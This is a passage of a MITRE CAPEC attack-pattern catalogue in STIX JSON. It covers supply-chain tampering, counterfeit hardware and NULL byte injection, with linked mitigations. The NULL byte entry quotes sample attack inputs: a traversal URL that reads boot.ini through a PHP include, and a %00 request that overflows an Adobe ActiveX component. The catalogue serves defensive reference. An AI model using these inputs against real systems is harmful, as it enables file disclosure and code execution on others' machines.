"relationship--4b968907-0019-4de5-a82c-c682cd39577d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11b49e7-b222-4698-9d7e-7b3098fd3c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed8d0d52-a412-470e-b2f6-7eaabadaa611", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate need-to-know information from system configuration information depending on the user.", + "id": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-518-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d472e01d-f213-4ced-9fb6-4461edf5f092", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-519", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/519.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Cause Errors in System Design", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \"fail open\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--692efabe-275a-4cc4-bce9-b954a6533546", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--133b4c1d-e9fa-451c-aa3f-f35f367c171d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f71d06-67ab-4df7-adc0-fc46f3ca18e4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40", + "modified": "2022-02-22T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--909a3c5e-8513-4df9-9bd5-f26ba60c60d8", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbc5aeb2-78f0-4099-a03c-df1e088a6f51", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--909a3c5e-8513-4df9-9bd5-f26ba60c60d8", + "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. 
The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).", + "external_references": [ + { + "external_id": "CAPEC-52", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/52.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Null Byte Injection", + "external_id": "28", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Null-Byte-Injection" + }, + { + "description": "Embedding Null Code", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Embedding_Null_Code" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability, iDefense Labs Public Advisory, 2004--08---13, Verisign, Inc.", + "external_id": "REF-445", + "source_name": "reference_from_CAPEC", + "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126" + }, + { + "description": "PHP Input Validation Vulnerabilities, Bugtraq mailing list archive", + "external_id": "REF-446", + "source_name": "reference_from_CAPEC", + "url": "http://msgs.securepoint.com/bugtraq/" + } + ], + "id": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Embedding NULL Bytes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Directory Browsing\n Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an adversary could insert a bogus username such as ../../../../../WINDOWS. If the adversary needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. 
Alternatively the adversary might apply the postfix NULL character (%00) to determine whether this terminates the string.\n Different forms of NULL to think about include\n PATH%00PATH[0x00]PATH[alternate representation of NULL character]%00\n ", + "\n Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote adversaries to execute arbitrary code.\n The problem specifically exists upon retrieving a link of the following form:\n GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1\n Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \"file not found\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an adversary to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:\n 0x77F83AE5 MOV EAX,[EDI+8]0x77F83AE8 MOV ECX,[EDI+C]...0x77F83AED MOV [ECX],EAX\n The register EDI contains a pointer to a user-supplied string. The adversary therefore has control over both the ECX and EAX registers used in the shown MOV instruction.\n Successful exploitation allows remote adversaries to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. 
Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.\n An adversary does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.\n Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445].See also: CVE-2004-0629", + "\n Consider the following PHP script:\n $whatever = addslashes($_REQUEST['whatever']);include(\"/path/to/program/\" . $whatever . \"/header.htm\");\n A malicious adversary might open the following URL, disclosing the boot.ini file:\n http://localhost/phpscript.php?whatever=../../../../boot.ini%00\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

  2. Techniques
    Try different encodings for null such as \\0 or %00

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) such that they remove data after the null byte(s) in a way that is beneficial to them.

  2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The program does not properly handle postfix NULL terminators" + ], + "x_capec_skills_required": { + "High": "Execution of arbitrary code", + "Medium": "Directory traversal" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle the NULL characters supplied as part of user input prior to doing anything with the data.", + "id": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-52-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--947c7cf0-0535-44ac-b13f-ddb607cc9a9c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64a972ab-fe03-40fb-86ba-13870ff9c74a", + "target_ref": "attack-pattern--7e2a629f-eb4d-4cc9-b086-42c7395b2c3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. 
The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-520", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/520.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. 
Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Hardware Component Inserted During Product Assembly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "\n A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The adversary constructs a counterfeit card that functions normally except that packets from the adversary's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the adversary to bypass the firewall unrestricted.\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. 
The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate manufacturer or manufacturer's supplier." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--64b5dfd3-c44c-4844-a314-e53b82029e27", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb844bff-17ce-4a81-b7c9-d963af144f72", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5afc2940-c2b6-4121-b080-99ad0686d346", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "target_ref": "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's hardware manufacturing process 
documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-521", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/521.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Hardware Design Specifications Are Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \"cores\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--232f172a-e624-4b85-b24e-42010deaa829", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39203ce0-f720-4381-82bc-7ef976ea1f67", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa6d23ee-16f5-46f4-9f1a-7d0646255857", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + 
"target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73386060-fc29-4295-9736-a0468733e412", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acfbfa08-6e49-42e8-8bbe-888a00887551", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--88547ca9-12fc-44e8-95b4-1e01d87849eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4df124af-fc21-48e0-92fe-933e563f8082", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary replaces legitimate hardware in the system with faulty counterfeit or 
tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-522", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/522.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Hardware Component Replacement", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "During shipment the adversary is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. 
Once deployed, the system functions as normal, but allows for the adversary to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target Hardware: The adversary must first identify a system that they wish to target, and a specific hardware component that they can swap out with a malicious replacement.

  2. Techniques
    Look for datasheets containing the system schematics that can help identify possible target hardware.
    Procure a system and inspect it manually, looking for possible hardware component targets. Search for manufacturer IDs on hardware chips or FCC IDs on wireless chips to determine their functionality.
  3. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

  4. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test a Malicious Component Replacement: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

  2. Techniques
    Design a malicious hardware component that will perform the same functionality as the target component, but also contains additional functionality.
    Obtain already designed malicious components that just need to be placed into the system.

Exploit

  1. Substitute Components in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary substitutes the malicious component for the targeted component. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

